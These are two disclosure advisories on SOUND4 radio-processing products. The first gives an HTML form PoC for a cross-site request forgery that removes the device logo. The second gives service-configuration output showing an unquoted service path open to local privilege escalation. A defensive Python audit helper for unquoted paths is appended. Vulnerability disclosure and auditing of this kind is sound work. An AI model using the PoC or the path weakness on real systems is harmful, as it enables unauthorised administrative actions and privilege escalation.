<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Cross-Site Request Forgery<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Desc: The application interface allows users to perform certain actions<br />via HTTP requests without performing any validity checks to verify the<br />requests. 
This can be exploited to perform certain actions with administrative<br />privileges if a logged-in user visits a malicious web site.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5722<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />PoC:<br />----<br /><br /><form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST"><br /> <input type="submit" value="Disappear" /><br /></form><br /></code></pre>
<pre><code><br />SOUND4 Server Service 4.1.102 Local Privilege Escalation<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: 4.1.102<br /><br />Summary: SOUND4 Windows Server Service.<br /><br />Desc: The application suffers from an unquoted search path issue impacting<br />the service 'SOUND4 Server' for Windows. This could potentially allow an<br />authorized but non-privileged local user to execute arbitrary code with<br />elevated privileges on the system. A successful attempt would require the<br />local user to be able to insert their code in the system root path undetected<br />by the OS or other security applications where it could potentially be executed<br />during application startup or reboot. If successful, the local user's code<br />would execute with the elevated privileges of the application.<br /><br />Tested on: Windows 10 Home 64 bit (build 9200)<br /> SOUND4 Server v4.1.102<br /> SOUND4 Remote Control v4.3.17<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5721<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />C:\>sc qc "SOUND4 Server"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: SOUND4 Server<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : SOUND4 Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"<br />C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F<br /> 
BUILTIN\Administrators:(ID)F<br /> BUILTIN\Users:(ID)R<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R<br /><br /><br />C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V<br />4.1.102<br /></code></pre>
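<p>Added example, not part of the advisory: an audit helper that reads <code>sc qc</code> output like the capture above, decides whether <code>BINARY_PATH_NAME</code> is unquoted with spaces, and lists the directories whose write permissions an administrator should review together with the quoted value to configure instead. The sample text is constructed from the advisory's output; the function names are assumptions.</p>

```python
import ntpath
import re

# Constructed from the `sc qc "SOUND4 Server"` output quoted in the advisory.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SOUND4 Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service
        SERVICE_START_NAME : LocalSystem
"""

FIELD = re.compile(r"\s*([A-Z_]+)\s*:\s*(.*\S)?\s*$")
EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def parse_sc_qc(text):
    """Turn `sc qc` output into a {FIELD_NAME: value} dict."""
    fields = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2) or ""
    return fields


def split_image_path(binary_path):
    """Return (image_path, arguments, quoted) for a service command line."""
    s = binary_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            end = len(s)
        return s[1:end], s[end + 1:].strip(), True
    m = EXE_END.search(s)
    if m:
        return s[:m.end()], s[m.end():].strip(), False
    head, _, tail = s.partition(" ")
    return head, tail.strip(), False


def audit_service(sc_qc_text):
    """Report whether the service path is unquoted and what to review."""
    fields = parse_sc_qc(sc_qc_text)
    image, args, quoted = split_image_path(fields.get("BINARY_PATH_NAME", ""))
    # For an unquoted path Windows tries each prefix that ends at a space,
    # with ".exe" appended, before it reaches the intended image.
    candidates = [] if quoted else [
        image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "
    ]
    dirs_to_check = []
    for candidate in candidates:
        parent = ntpath.dirname(candidate)
        if parent not in dirs_to_check:
            dirs_to_check.append(parent)
    return {
        "service": fields.get("SERVICE_NAME", ""),
        "account": fields.get("SERVICE_START_NAME", ""),
        "vulnerable": bool(candidates),
        "candidates": candidates,
        "dirs_to_check": dirs_to_check,   # non-admin write access here is the risk
        "quoted_value": '"%s"' % image + (" " + args if args else ""),
    }


if __name__ == "__main__":
    for key, value in audit_service(SC_QC_OUTPUT).items():
        print("%-14s %s" % (key, value))
```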